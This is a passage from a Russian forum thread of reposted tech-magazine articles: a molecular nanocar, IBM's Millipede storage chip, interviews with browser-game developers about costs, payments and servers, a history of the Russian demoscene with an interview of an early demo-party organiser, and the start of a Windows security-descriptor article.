Многие серьезные ученые и исследователи, знакомые с современным состоянием нанотехнологий и НЭМС, сначала в это не поверили, ведь до сих пор ученым не удавалось сделать что-то сложное. А тут – легковушка, состоящая из одной молекулы, размером 4 нанометра! Для серьезного дядьки-ученого это практически невозможно! Ведь 4 нанометра – это всего лишь отрезок, на котором можно поместить около 40 атомов водорода, и это чуть больше, чем толщина ДНК!

Но это правда. Глава ученых Джеймс М. Тур смог доказать свое открытие – колесящие багги под дулом электронного микроскопа были выставлены на обозрение любому желающему.

Автомобиль же - большая молекула-наносистема, состоящая из трехсот атомов, она похожа на машину только наличием четырех "колес" и способом передвижения.

В качестве колес легковушке служат фуллерены, молекулы С60, похожие на футбольный мяч, связанные химическими связями с "каркасом" машины.

Синтез и тестирование наномашины поможет значительно ускорить производство таких сложных структур, как нанофабрики или нанороботы, методом сверху-вниз. А это, в свою очередь, означает практическое внедрение микроскопических машин в твою жизнь.

Вообще, искусственные объекты такого маленького масштаба, напоминающие внешне автомобили, уже были синтезированы химиками. Но этот автомобиль – первый действующий, он катится по поверхности так же, как катятся автомобили на своих колесах.

Исследователи придумали оригинальный метод приведения в движение наномашины: они нагрели ее до 200° С, что вызвало вращение фуллеренов-колес на химических связях, соединяющих их с "рамой машины". От вращения четырех молекул легковушка пришла в движение и смогла катиться по плоской золотой поверхности.

Чтобы убедиться в том, что машина действительно ездит, а не скользит, и ее передвижения связаны с вращением фуллеренов-колес, ученые засунули полигон с машинками под сканирующий туннельный микроскоп.

Каждую минуту ученые получали с него снимки машин, доказывающие, что колеса действительно вращаются, и благодаря их вращению машина может ехать!

Более того, наномашину можно подцепить зондом микроскопа, как краном, и перемещать с места на место. Естественно, что она легче входит в соединение с зондом, когда захват происходит по направлению движения машины (проверено учеными).

Восемь лет группа ученых совершенствовала технику производства наномашин, и вот наконец их попытки увенчались успехом. Удалось найти решение проблемы несовместимости палладиевых катализаторов, помогающих собирать раму машины, с молекулами фуллеренов, которые тормозят синтез молекулы. Но методом проб и ошибок это затруднение все же было преодолено.

Ученые уверены: машина сможет перевозить молекулярные грузы в различных направлениях, что найдет применение в наноконвейерах, нанофабриках и других сложных наносистемах. Также она может служить платформой для различных мобильных наносистем: нанороботов, наноманипуляторов. Представь себе: прикрепив на ее хребет наноманипулятор, мы получаем мобильную сборочную станцию!

В качестве энергетической подпитки исследователи хотят использовать дистанционные батарейки - направленные пучки фотонов - вместо нагревания среды, в которой находятся машины. Так появится возможность дистанционно ими управлять и координировать их перемещения с высокой степенью точности
кошмары принца Чарльза]

Ну, конечно, багги – дело хорошее, однако что будет, если один умный крендель приварит к машине с молекулярным манипулятором еще и слабенький компьютер, способный выполнять одну-единственную программу: собирать из окружающих атомов такие же машинки? А потом, представь, они расползутся и под благодатными и полезными солнечными лучами будут клепать свои копии, пока все вокруг не превратится в автомонстров?

«Ответим агрессорам первыми! – сказал прынц Чарльз. - Не дадим механическому отродью разобрать нас на молекулы!» И теперь, по крайней мере, в Объединенном Королевстве, гады не тронут местное население, ведь что может быть страшнее злого принца Чарльза? Местным ученым это очень не понравилось, и они втайне от принца стали подпольно варить механическое зелье, на которое потом не найдешь управы.

Вот такие они, сказки нового века.

То ли еще будет. Оставайтесь с нами.

Для CD:

RazMol – прога для просмотра моделей в pdb-формате +Набор молекулярных моделей

DANGER:

Как посчитал ученый Роберт Фрайтас, молекулярные машины-агрессоры смогут переделать всю биомассу Земли в свои копии всего за два года. У тебя еще есть время попить пива с друзьями ?

WWW:

Галерея украинского микроминиатюриста Сядристого: http://www.microart.kiev.ua

Институт предвиденья с молекулярными моделями: http://www.foresight.org

ChemOffice 2006 Trial – аццкая прога, в которой собирают молекулярные машины http://scistore.cambridgesoft.com/software/product.cfm?pid=4013

МЭМС - «Многоножка» от IBM

"Многоножка" представляет собой "чистую" цифровую технологию. Принцип ее работы можно сравнить с работой старых проигрывателей грампластинок, в которых считывающая вибрирующая игла скользила по борозде, несущей информацию, только у "многоножки" есть ряд кантилеверов, скользящих по поверхности хранения данных, на которой есть углубления, кодирующие 1 и 0. Таким образом, отклонения кантилеверов от равновесного положения переводятся в набор 0 и 1.

Благодаря нанотехнологиям чип изготовлен по 10-нанометровому техпроцессу, позволяющему размещать на органической пленке, которая выступает в качестве носителя информации, углубления диаметром 10 нанометров. Расстояние между углублениями составляет 100 нанометров, что позволило разместить на чипе довольно большую матрицу атомно-силовых кантилеверов. Наличие углубления соответствует логической "1", а его отсутствие - логическому "0". Кантилевер - это специальный атомно-силовой зонд (см. рис. 2), который "ощупывает" сканируемую поверхность, изменяя свое положение в пространстве в зависимости от того, встретит он на пути углубление или нет.

При чтении данных специальный привод кремниевого "стола", на котором размещена пленка с данными, перемещает ее в плоскости по заданным координатам X и Y. А привод мультиплексора позволяет управлять каждым кантилевером индивидуально, обеспечивая адресацию памяти. При этом матрица кантилеверов обеспечивает параллельное чтение/запись данных.

"Многоножка" будет иметь емкость 100 Гб при размерах обычных SD-карт. Минимальная емкость "Многоножки" составит 10 Гб.

Как говорит IBM, эта переломная технология завоюет рынок к 2007 году.




Автор: Metallica Nov 21 2006, 14:06

Проект NeverLands (www.neverlands.ru)



Несколько слов о создании игры. Как пришла идея? Кто принимал участие в непосредственной реализации?

В конце лета 2004-го года пришла идея создать игру, в которую интересно было бы играть, прежде всего нам самим. На то время у нас уже были кое-какие идеи, основанные на личном опыте. Мы на себе испытали все достоинства и недостатки онлайн-игр, поэтому имели достаточно четкий план создания своей. Как выяснилось, он был совершенно неверным. Все оказалось гораздо сложнее и прозаичнее, чем мы могли предполагать. Но отступать было уже поздно. Так появился домен neverlands, на котором не было ничего, кроме форума, где обосновалась небольшая группа энтузиастов, которые помогали, чем могли. Но основную работу делали всего три человека, только один из которых был программистом.

Каковы были первоначальные инвестиции в проект? Что является основными источники дохода сейчас?

Первоначальные инвестиции в проект были примерно в размере 20-ти долларов. Именно столько стоила аренда домена.

Затраты игроков на игру? Средние/максимальные?

Затраты игроков на игру определяются прежде всего самими игроками. Большинство из них не тратят ни копейки.

Как все технически устроено?

Проект можно разделить на 3 основных блока:

1. Чат (общение + множество функций для работы самой игры).

2. Системные программы, которые постоянно работают на сервере. Они отвечают за защиту от ботов, очистку системы, выдачу подарков на День рождения и многое другое.

3. Сама игра (верхний фрейм, весь игровой процесс обслуживается одним файлом с подключаемыми дополнительными модулями).

Сколько серверов обсуживает игру, каковы их характеристики?

В данный момент проект обслуживает 5 серверов. Машины все двухпроцессорные, памяти минимум по 2 GB, RAID массив SCSI.

Были ли попытки взлома и к чему они привели?

Попытки взлома были. К чему-либо существенному они не привели - небольшое время в роли администратора. Все взломы быстро устранялись. Система раньше была дырявая (серверная часть + инъекции в БД). Уже более полутора лет никаких подобных проблем не было.

Каковы планы на будущее и текущее положение дел?

На данном этапе у нас функционирует два города и огромная игровая местность. Именно местность, а не карта. По ней игроки могут свободно перемещаться, отбиваться от враждебно настроенных ботов, собирать различные травы, для последующего использования их в алхимии (на данном этапе существует около 50-ти рецептов и этот список постоянно растет). Введено около 1000 видов оружия, доспехов, игровых предметов. Готовятся шахты, в которых можно будет добывать игровые ресурсы. Почти закончена разработка замков и боев за отвоевание их у противников. Начата работа над игровой магией, насчитывающей более 200 заклинаний. Разрабатывается система школ, для расширения возможностей игровых персонажей. Готовится к изданию книга NeverLands.

Игра Wizards World (http://wiw.mail.ru) или по-русски - «Мир Волшебников».

Несколько слов о создании игры. Как пришла идея? Кто принимал участие в непосредственной реализации?

Первая версия Wizards World (или сокращенно - WiW) была задумана и открыта в далеком 2003-м году несколькими энтузиастами. В том числе программистами и фанатами онлайновых браузерных игрушек, которые тогда можно было сосчитать по пальцам одной руки. С тех пор много воды утекло — игра WiW была приобретена компанией "Веб Интерактив Ворлд", постоянно дополнялась и модернизировалась: менялся дизайн, значительно расширялся геймплей, подключались коммерческие услуги, появлялись новые игровые города, новые партнеры, новые сервисы...

Каковы были первоначальные инвестиции в проект? Что является основными источники дохода сейчас?

В 2003-2004 годах стоимость разработки и выхода на рынок несложной web-based онлайновой игры составляла несколько тысяч долларов. Сейчас «ставки» выхода на рынок значительно выросли. Вложения в разработку и развитие WiW суммарно за 2003-2004 годы составили около 100 тысяч долларов.

Основной источник дохода всех онлайновых игр - продажа игровых преимуществ. В WiW мы продавали и продаем рекламу в формате product placement, но пока, к сожалению, это единичные случаи (игровые предметы с символикой рекламодателя, спонсорские мероприятия, игровой город для компании "Мастерхост" и т.п. - wiw.ru/pp/). По прогнозам экспертов, в ближайшее время ситуация должна измениться — об этом больше говорят и пишут, даже начали появляться специализированные агентства.

Затраты игроков на игру? Средние/максимальные?

Очень разные: от 1 доллара (стоимость 1 SMS для того, чтобы получить бонусы или, например, покормить своих домашних животных) до 28 тысяч долларов зараз - когда пользователь покупает целый игровой город (http://wiw.ru/company/relis22.htm). Есть и средний класс, есть и экономный — как в обычной жизни.

Некоторые игроки платят только за дополнительное время (когда у них в Wizards World заканчиваются 30 бесплатных часов, отведенные на неделю каждому игроку) - 150 рублей за неделю неограниченного игрового времени, а некоторые стремятся вооружить своего персонажа по последней моде. Поскольку успешные российские онлайновые игры условно-бесплатные, то количество платящих игроков варьируется у различных проектов от 5 до 50%.

Система платежей. Каким образом Вы принимаете деньги от игроков? Существуют ли независимые организации (биржи, «барахолки»), которые делают деньги с помощью Вашей игры?

Пользователи WiW платят за услуги на основании публичного договора-оферты с компанией "Веб Интерактив Ворлд", каждый платеж - обязательно на основании счета, выставленного автоматической системой (биллингом). Это как в обычном интернет-магазине — понятно и прозрачно для покупателя.

Игрок может заплатить любым удобным для него способом: банковским переводом, банковской (пластиковой) картой Visa, MasterCard, American Express или JCB, различными электронными платежными системами (Яндекс-деньги, WebMoney, MoneyMail и др.), через международную систему Contact (в этой сети более 1000 банков-участников на территории России). Мы постоянно проводим мониторинг наиболее массовых систем платежей и подключаем наиболее удобные и популярные, например, скоро мы подключим возможность платежей через терминалы систем "Элекснет" и "ДельтаКей".

Как все технически устроено?

А все интернет-проекты устроены примерно одинаково. Это несколько серверов, на которых функционируют взаимосвязанные друг с другом распределенная игровая система, отдельные системы резервирования, авторизации, оповещения, отслеживания ботов и т.п.

Сколько серверов обсуживает игру, каковы их характеристики?

Проект Wizards World - высоконагруженный web-сервис (более 200 тысяч пользователей ежемесячно). Парк серверов - 5 штук. Обычно в качестве боевых серверов используются двухпроцессорные серверы с 8 Гб или большим количеством оперативной памяти: от сотни гигабайт дискового массива с зеркалированием и т.п.

Проект TimeZero (www.timezero.ru)

Несколько слов о создании игры. Как пришла идея? Кто принимал участие в непосредственной реализации?

Идея создания проекта возникла осенью 2003-го года. Нужна была игра, принципиально отличающаяся от существующих на рынке, онлайн-игра нового поколения. Хотелось сделать не обычный фэнтезийный проект с эльфами, а постатомный мир в духе Fallout, с десятками тысяч локаций, с мутантами и радиацией, с интересной боевой системой. И вот, с легкой руки Андрея Иванова (aka Karma), Алексея Владимирова (aka Merlin) и Бориса Герцовского (aka Bo Dun) игра начала обретать очертания. Бета-тест был запущен в мае 2004-го года, и в первый же день игру посетили около 6-ти тысяч человек. Несколько недель спустя, 28 июня, уже состоялся официальный релиз.

Каковы были первоначальные инвестиции в проект? Что является основными источники дохода сейчас?

Во время создания игры инвестиции были относительно невелики (150-200 тысяч долларов). Сейчас, чтобы создать проект такого уровня, потребуются затраты минимум в 2-3 раза выше. Вообще, проекты подобные нашему, вполне способны существовать на доходы от рекламы и product placement.

Затраты игроков на игру? Средние/максимальные?

Для 70-75% игроков затраты на игру ограничиваются стоимостью интернет-связи. Часть игроков, при желании, может потратить деньги на дополнительные сервисы — на установку аватара или покупку VIP-клиента с расширенными игровыми возможностями. Средние затраты одного игрока посчитать достаточно сложно, но они не превышают нескольких долларов.

Система платежей. Каким образом Вы принимаете деньги от игроков? Существуют ли независимые организации (биржи, «барахолки»), которые делают деньги с помощью Вашей игры?

Сама компания TimeZero не принимает деньги от игроков. Если говорить о черном рынке, то он существует, как и во многих других играх. Оборот незаконных сделок составляет не менее 4-5 тысяч долларов ежемесячно. Все это совершается либо в самой игре, либо через сайт Геймлот и ему подобные.

Сколько серверов обсуживает игру, каковы их характеристики?

Сейчас игру обслуживают 5 серверов, включая тестовый и резервный - 2x Dual Intel Xeon HT CPU 2.80GHz, 2x Dual core AMD Opteron 275 (2.2 GHz). На настоящий момент этих мощностей достаточно, и они нас полностью устраивают. В случае необходимости, конечно же, будем расширяться.

Были ли попытки взлома и к чему они привели?

Взломов не было, серьезных попыток – тоже. DoS-атаки случались, но в целом – ничего серьезного.

Каковы планы на будущее и текущее положение дел?

TimeZero занимает одну из лидирующих позиций в рейтинге mail.ru и обладает своей вполне сложившейся аудиторией. Сейчас в игре зарегистрировано примерно 150 000 персонажей. По нашим подсчетам количество активных игроков составляет около 60-70 тысяч человек. На сайте постоянно в онлайне находится в среднем 5 000 человек в день.

Геймплей TimeZero развивается достаточно активно. На настоящий момент в игре зарегистрировано больше 150 официальных кланов, существует 8 городов, которые управляются игроками, зарегистрированы десятки фан-сайтов, посвященных игре. География проекта достаточно обширна: Россия, СНГ, Израиль, Германия, Америка, даже из ЮАР есть игроки. Игра уже сейчас переведена на 3 языка: немецкий, английский и турецкий.

Проект Территория (www.territory.ru)

Несколько слов о создании игры. Как пришла идея? Кто принимал участие в непосредственной реализации?

Идея игры возникла более трех лет назад в головах трех геймеров. Именно тогда они вместе еще с целым рядом игроков были отлучены администрацией Бойцовского Клуба от любимой игрушки. Расстроенные игроки объединились и решили создать свою игру. Ну а дальше, как полагается, подсчитали финансы, собрали команду профессионалов — и работа закипела. Так и появилась Территория. Игра была разработана менее чем за один год. На самом деле, это рекордно короткий срок для игры такого масштаба, как Территория.

Система платежей. Каким образом Вы принимаете деньги от игроков? Существуют ли независимые организации (биржи, «барахолки»), которые делают деньги с помощью Вашей игры?

В игру интегрирована собственная система примема платежей - "Террабанк". Созданная нами система позволяет не только оплачивать дополнительные игровые возможности, но и выводить деньги из игры. Система вывода из игры реальных денег впервые была успешно опробована в "Территории". Через "Террабанк" игрок может получить на руки реальные деньги, заработанные виртуальным способом. Для этого достаточно просто играть в игру, зарабатывать игровую валюту и менять ее на реальные деньги. Некоторые игроки "Территории" сегодня зарабатывают от $50 в неделю. Кстати, пополнять игровой счет также можно посредством SMS-сообщений.

Затраты игроков на игру? Средние/максимальные?

Бизнес-модель игры - условно-бесплатная. Это значит, что любой желающий может играть в Территорию, не вкладывая ни копейки. За реальные деньги в игре можно купить эксклюзивные игровые вещи (арты) и дополнительные игровые возможности.

Каковы планы на будущее и текущее положение дел?

На настоящий момент в игре более 900 000 зарегистрированных пользователей. Ежедневно игру посещают около 20 000 уникальных пользователей. Территория продолжает расширяться и совершенствоваться. В игре регулярно появляются новые локации, расширяются границы виртуального города, проводятся акции с розыгрышами реальных призов. Политика игры меняется в направлении реализации творческого потенциала наших игроков. Игроки "Територии" могут сами создавать и совершенствовать любимую игру. У них есть возможность самим создавать сайты своих кланов, писать новости, модерировать чат игры и даже рисовать индивидуальные образы... Подобная политика вполне оправдывает себя. Создавая игровой мир своими руками, игроки ценят и оберегают свое творение от любых негативных влияний.




Автор: Metallica Nov 21 2006, 19:54

Сценерский лайфстайл: часть 1Воспоминания старичков Cцены

Я решил написать эту статью по двум причинам. Прежде всего потому, что все материалы, написанные о Сцене, рассказывали об этом явлении очень поверхностно. Второй причиной стала недавно опубликованная в ][ статья "Хакерский лайфстайл 90-х", которая натолкнула меня на мысль выяснить, насколько близки были по духу хак-сцена и демо-сцена. В любом случае, думаю, тебе будет интересно узнать, чем жили и занимались наши сценеры на протяжении последних 15-ти лет. Тем более что информацию ты получишь, что называется, из первых рук.

Полевой андеграунд

В те годы, когда андеграунд потихоньку начинал просачиваться в Россию с Запада, Сцена была единой. Люди брались за все: демо-мейкинг, варез, крэкинг, аски-арт, останавливаясь на том, что получалось у них лучше всего. В это время первыми русскими электронными журналами были "Хакер" (не путать с ][ акером) и его злейший противник e-zine "HARM". Они публиковали материалы о вирусомейкинге, техниках рисования многоэкранных ANSI и другие специализированные материалы. Это была Сцена во всем ее «многообразии».

Первыми сценерскими компьютерами были Cпектрум и Амига. Многие писишные сценеры начинали именно с этих платформ. Все, что попадало в Россию из софта, было уже взломано западными крэкерами, так что волей-неволей русские компьютерщики узнали о таком явлении, как демо-сцена. Игрушки сопровождались интрами крэктимов, названия которых внушали трепет. Основной поток сценерского стафа шел из Польши, оттуда же к нам явился так называемый scene spirit - сценерский дух.

До того момента, как сети стали доступными, релизы распространялись обычными людьми. В Питере местом, где можно было раздобыть свежачок, был культовый рынок "Автово" (ныне ЮНОНА). В других крупных городах были свои тусовочные точки. Варез приобретался там и распространялся дальше через проводников поездов дальнего следования. Торговые точки в «Автово» содержали рядовые сценеры, геймдевелоперы (такие как Softland Software, ViKs) и просто хорошие люди, которые торговали софтом по символическим ценам, едва превышающим стоимость дискеты. Из последних можно отметить фирму «Логрос», имевшую точки на Юноне и магазинчик на Петроградской стороне, в котором постоянно собирался творческий спектрумовский народ. Все хитовые релизы распространялись через них: сценеры приносили Логросу свои сокровища, а они делились с остальными. На самом раннем этапе возникновения рынка "Автово" народ собирался прямо на поле. Приходили, выкладывали на тряпочках всякие компьютерные запчасти, дрели, телевизоры и торговали, обмениваясь новостями, обсуждая, «как жить дальше». Милиция, естественно, их гоняла: в советское время перепродажа вещей считалась спекуляцией и наказывалась. Но искоренить это было невозможно.

В 1993-м году появились спектрумовские модемы – Vicomm. Ужасно примитивные, но для прогрессивных компьютерщиков это была революция. Самые свежие сценерские и игровые новинки можно было получить, не выходя из дома! Первой спектрумовской BBS была Eldorado, созданная для поддержки этого самого Vicomm. Потом уже стали появляться другие борды. Появление модемов сделало доступной сеть FIDO, в которой появились спектрумовские шлюзы. А еще позже получила рождение FTN-сеть ZX-Net.

Наскальные надписи

В это время HRg стала призывать в своем e-zine "HARM" не браться за все сразу и не смешивать разные "Сцены" в одну. Появились первые определения: арт-сцена, демо-сцена, хак-сцена и так далее. Хотя отдельные сообщества обосабливались и без hrg-шного совета: аски-художики перестали рисовать .nfo для пиратов и, сбившись в ascii-группы, выпускали арт-паки. Популяризация Интернета сделала ненужными борды, и народ, представляющий разные сценовые направления и ранее совместно тусовавшийся на элитных BBS, разбежался по специализированным веб-сайтам. Мастера хайреза и пикселя разделились на два лагеря: первые, рисовавшие в лучших традициях демо-сцены, остались преданными ей, а художников, тянувших на всякие эксперименты и новую технику рисования, вобрала в себя арт-сцена. Через несколько лет, побледневшая, затерявшаяся, в океане мирового креативного сообщества.

Что касается музыкальной тусовки, один из олдскульных сценовых музыкантов LAV, бывший в свое время членом HRg, а позже Sands, рассказал следующее: "Музыканты всегда были немного отделены от хакерской тусовки и состояли в ней только для того, чтобы просто где-нибудь "состоять", поэтому в дела и разборки хакеров они не лезли. Наиболее успешные музыканты обособились и создали отдельные творческие группы, самой известной из которых в середине 90-х стала The SandS. Ее членами были лучшие из лучших».

По-настоящему бурное развитие получила демо-сцена. В то время каждый считал себя обязанным написать свою, пусть даже самую примитивную демку, чтобы выразить друзьям свой респект или передать fuck-выражение. Какие кипели страсти в скролингах интр тех лет! Сценеры вели переписку посредством бегущих строк, спорили, ругались – это была уникальная система общения. Напишет, например, один мини-демку со строчкой типа: "Привет, я ZeroCold из города Махачкала, сделал вот такой суперэффект, смотрите! Greetings: Acid Burn, Nikon. Fuck to Plug из города Берюки! Всем BYE!!». А через несколько недель в другом конце страны выходит другая демка с текстом: «Hi, я Plug из Берюков, а это моя новая мегакрутая демка. Greetingz to: God, Sex, Love, FUCK TO ZeroCold из Махачкалы. Твой суперэффект - полный шит и мастдай, а сам ты нубище полное! Всем пока! ByeBye!". Такая переписка в интрах была важной частью субкультуры тех лет. Сейчас как-то не укладывается в голове, что можно 20 минут читать бегущую строчку, пусть даже оформленную красивым переливающимся шрифтом. Особенно интересно было, сидя в школьном ВЦ, читать, как человек из далекой Америки, Германии или Польши пишет что-то вроде: «Сейчас 03 ночи. Я доделываю свою музыку, а товарищ рядом дорисовывает лого. Передаю ему слово. Hi, это …". Очень живо представлялось, как за тысячи километров кто-то что-то тебе пишет, будто это происходило именно в момент прочтения. Сетей ведь тогда почти не было, а те, которые были, работали только с машинами под Unix'ом или на рабочих станциях. Там, кстати, были тоже свои традиции, хотя Сценой это не называлось. Text only mode накладывал отпечаток.


Многие демки делались в подарок - например, на день рождения другу-сценеру. Были и специальные «обсирающие» демки, а также информационные или рекламные, по типу популярных сейчас invitation – программы, прокручивающей определенный эффект и приглашающей принять участие в демо-пати».

Сценовые тусы

Демо-пати была одной из точек соприкосновения разных сцен. Их посещали как "хакеры", так и ascii-художники, демо-мейкеры и музыканты. Первой из проходивших в России пати стал Enlight, стартовавший в 1995-м году. Чтобы узнать, как все начиналось, я побеседовал с человеком, которого считают «отцом всех русских демо-пати». Зовут его Петр Соболев, в сценерских кругах более известен как Frog и CodeRipper. Интерьвю с ним читай на врезке.

Демо-пати реально собирали всех под одну крышу. Мы могли по году ругаться и общаться со своим закрытым сообществом аски-художников в фидошной эхе ru.pictures.psevdo.graf, не принимать никакого участия в делах демо-сцены, но тем не менее к демо-пати готовились, присылали работы для ascii-compo, и если могли, приезжали.

Пример из обычной сценовой жизни. 2000-й год. В Москве тогда должен был вот-вот состояться Mindresource, и свою работу я рисовал буквально в ночь перед событием, уверенный, что ради меня сделают исключение и примут. А для большей уверенности переслал ее не напряму, в оргкомитет пати, а своему согрупнику, москвичу E-Lex'y, который с утреца, за пару часов до компо, скопировав мою аскишку на дискету, прямо вручил ее упиравшимся организаторам. Сначала Лекса не пускали, но, заявив что-то в духе: "Я - элита, и тараканы мне не указ", он прорвался через ограждения, секьюрити и передал диск нужным людям. В итоге эта работа взяла первое место. Каково же было мое удивление, когда выяснилось, что Лекс отдал совсем не ту работу, которую я приготовил. Зная вкусы посетителей демо-пати, я нарисовал из ансишных кубиков обнаженную женскую грудь, а Лекс выставил трехмерную буковку «T», в типичном для стрит-арта написании, которую я нарисовал много раньше. Или вспомнить первый Chaos Constructions в 99-м году. Это сейчас CC проходит в чистеньком, цивильном ЛДМе, а тогда - в какой-то школе на окраине города, куда съезжались люди из разных городов. Казалось, что все знают друг друга, что ты попал в какое-то "тайное общество". То демо-пати никак нельзя было назвать фестивалем - скорее это был слет для непосвященного, имеющий какой-то ритуальный смысл.

Продолжение следует.

Интервью с CodeRipper'ом

Crasher: Я, наверное, не ошибусь, если скажу, что Enlight 95 стал поворотным событием на демо-сцен,, ведь ему удалось собрать людей из разных уголков стран СНГ, заявить о существовании сценовой субкультуры на более высоком уровне.

Frog: Возможно, но я бы не взялся это утверждать. Дело в том, что связующим звеном для людей, неравнодушных ко всяким специфическим компьютерным вещам, у нас выступал (и по-прежнему выступает) FidoNet. Уже тогда проводились сисопки, просто они были менее организованны, масштаб был поменьше. Первые два Enlight’а многие восприняли именно как сисопку, поскольку большинство сценеров были фидошниками и знали друг друга.

Crasher: Как пришла идея организовать глобальный слет сценеров?

Frog: Еще когда я сидел на Commodore 64 и читал всякие diskmag'и, там рассказывалось о зарубежных демо-пати. Мы знали про финскую Assembly, которая проводилась с 1992-го года, видели своими глазами Unreal, Second Reality, Panic, имели представление о легендарной группе Future Crew. Известный ныне Abyss - главный организатор Assembly - был тогда сисопом StarPort BBS. Это была официальная борда Future Crew. Мы туда звонили, что-то качали. Потом я переписывался с Gore (в то время - главный организатор и идейный вдохновитель Furure Crew). В 1995-м году уже настало время PC, появились сети, в России народ принялся активно писать интры и демы. Было понятно, что если мы организуем пати, люди выставят свои работы, приедут. Так и оказалось.

Crasher: После инлайта в разных уголках России появились другие демо-пати: Mindresouce, Millenium, Paradox, Bytefall, DiHalt, Cafe. Но именно питерские оказались самыми популярными и «живучими». Почему?

Frog: Большинство демо-пати, проходящих за пределами Москвы и Питера, при всем старании организаторов, не могли собрать большое количество сценеров. Одно дело приехать в Питер, другое – в Казань. К примеру, если на E'97 было порядка 1200 человек, то на упомянутых тобой - максимум 150-200. Правда, московкие тусы тоже не пользовались большой популярностью, и я до сих пор не понимаю, почему в Москве нет масштабной… да что масштабной, хотя бы регулярно проводимой демо-пати. Казалось бы, все условия есть: деньги через город текут рекой, есть коммуникации, много людей. Но чего-то не хватает. Целых два года нам понадобилось, чтобы мы расстались с иллюзиями о том, что сценеры сами могут поддерживать порядок в своих рядах, что будут себя прилично вести. Увы, это не сработало. ENLiGHT'97 стал для организаторов холодным душем: сотни человек, которые, если брать по отдельности, хорошие и интересные люди, собравшись вместе, вели себя так, что праздник закончился отменой второго дня и милицией. На 1200 посетителей у нас было около 5-ти человек, которые обеспечивали безопасность, причем добровольцев, а не профессионалов. Понятно, что хоть они и старались навести порядок, но мало что могли сделать. Народ с легкостью проносил в зал спиртное, и через некоторое время ситуация стала неуправляемой. Сейчас вспоминается один сценер, бегающий по party place в пневматической винтовкой. В общем, после ENLiGHT'97 мы сделали для себя серьезные вывод, и очередной слет, теперь уже названный Chaos Constructions, прошел только через 7 лет, в 2004-м году.

Crasher: В чем же заключается fun-посещения и участия в демо-пати?

Frog: Это трудно описать словами. Весь кайф состоит из отдельных моментов, причем у каждого они свои. Например, просмотр очевидных фаворитов конкурсов demo или intro. Когда ты смотришь на большом экране работу, которую ранее нигде не показывали, рядом с тобой на экран смотрят люди, которым интересно то же, что и тебе, реагируют на те же моменты, что и ты. Разговоры в фойе с людьми из других городов, а то и стран, которых не видел несколько лет или с которыми впервые познакомился в реале. Томительное ожидание результатов... Помню, на ENLIGHT'96 наш человек со списками результатов еле смог вырваться из толпы, рванувшей посмотреть, кто же победил smile.gif. Такое вот единение - это весьма необычное ощущение.

Crasher: Ты был на Сцене у самых ее истоков. Расскажи, как зарождалась Сцена в России?

Frog: Я застал еще полное отсутствие у нас всякой сцены. Amiga тогда только-только стала появляться - у нас ее счастливыми владельцами были только серьезные студии телевидения. У обычных людей были лишь Commodore 64, Atari XE/XL. На Коммодоре имелось некое подобие Сцены – думаю, на весь Союз человек 15-20 максимум. Переписывались с зарубежными группами обычно по почте. GhostRider, ныне отошедший от дел, получал 5" диски, расписанные фломастером: "IKARI TALENT", "FAIRLIGHT", "TRIAD", потом рассылал все это тем самым 15-ти знакомым. В начале, между сценерами не было никакой разницы. Конечно, кто-то занимался больше варезом, кто-то больше кодил, но в целом крутились в «одном соку», и все были «свои люди».

Что касается модемов, то на Commodore 64 они были на 160 и 300 бод, внешние. Но у нас они являлись диковинкой и на практике не использовались. Лично мой первый модем (для PC) был акустическим - такая штуковина с резиновыми накладками. На нее клалась телефонная трубка, и они там свистели между собой. Правда, он почти не работал из-за какой-то странной системы команд. Первый работающий модем у меня был на 1200 бод, внутренний, без MNP. Представлял собой длиннющую плату ISA 8bit (PC XT). С ним я довольно долго ползал по BBS, качал почту. Под конец он стал дохнуть, и приходилось во время работы ставить рядом бытовой вентилятор. Потом уже появились 2400, 9600. Сейчас забавно вспоминать, что было время, когда модем на 9600 был чуть ли не единственным в городе, и на него ходили смотреть, как на чудо техники (в Кронверк, кажется).

Crasher: Ты видел весь процесс развития, какие вещи были характерны для ранней Сцены и утеряны сейчас?

Frog: Одной из характерных вещей того времени были так называемые "noters". Скажем, группа зарелизила дему или диск с варезом. Запускается программа-нотер и в ней пишется какой-нибудь приветственный текст тем, кто этот диск получит. Программы эти были разные, но суть была в том, что текст можно набивать красивым шрифтом, с имитацией перемещения курсора - как на печатной машинке. Можно делать летающие логотипы, вставлять музыку - все это либо рисовали сами, либо выдергивали из игрушек и линковали к программе. После нажатия «Save» генерировалась программа, вмещающая все это в одном запускаемом файле. Человек получал диск, читал текст и мог написать ответ в этой же самой программе. Своего рода электронное письмо, но куда более близкое к настоящему письму - в нем чувствуется писавший его человек. Вот такая вот утраченная традиция! Другой интересной вещью было графическое оформления директорий. Это сейчас, когда набираешь "DIR" или смотришь в подкаталог, файлы там лежат отсортированные по какому-то признаку. А тогда ничего такого не было. На том же C64 ты вставляешь диск, даешь команду "Показать содержимое" и получаешь список файлов в определенной последовательности. Народ это быстро просек и рисовал псевдографикой разные рамки, картинки. Можно было при выводе директории даже очищать экран и менять цвет курсора специальными командами. Большую роль играли загрузчики. Дисководы были медленными, и, чтобы загрузить игру или программу, необходимо было ждать минуты. Поэтому писались загрузчики, которые параллельно с загрузкой рисовали картинку, играли музыку (музыка грузилась быстро, так как FM-синтез имеет небольшой размер). Позднее появились скоростные загрузчики - дисковод перепрограммировался, и одна из линий шины (кажется RESET) использовалась как второй бит в последовательном интерфейсе. Дисководы от этих скоростных загрузчиков издавали жуткие звуки, головка частенько сбивалась так, что его приходилось ремонтировать уже физические.

Crasher: Скоро пройдет Сhaos Constructions 2006. Что нам стоит ожидать?

Frog: Время проведения - с 26 по 27 августа. Ожидается ряд очень серьезных новшеств. Мы попытаемся сделать наш фестиваль менее формальным, для чего, к примеру, людям со своим компьютером будет обеспечен бесплатный вход, стол, розетка, Интернет. Все детали можно найти на сайте http://cc6.org.ru.



Автор: Metallica Nov 22 2006, 12:32

Железобетонные объектыhttp://www.vr-online.ru

Дескрипторы и идентификаторы безопасности

Очень часто, программно создавая объекты, мы не задумываемся о безопасности, оставляя ее параметры на усмотрение ОС. Но ведь управление правами доступа не такая уж и сложная операция и требует всего нескольких лишних строчек кода и понимания работы соответствующих функций. Знание функций управления доступом может пригодиться не только при создании объектов, поэтому сегодня мы решили рассказать тебе про SID, Security Attributes, Security Descriptor и обо всем, что связано с этими понятиями.

Атрибуты безопасности

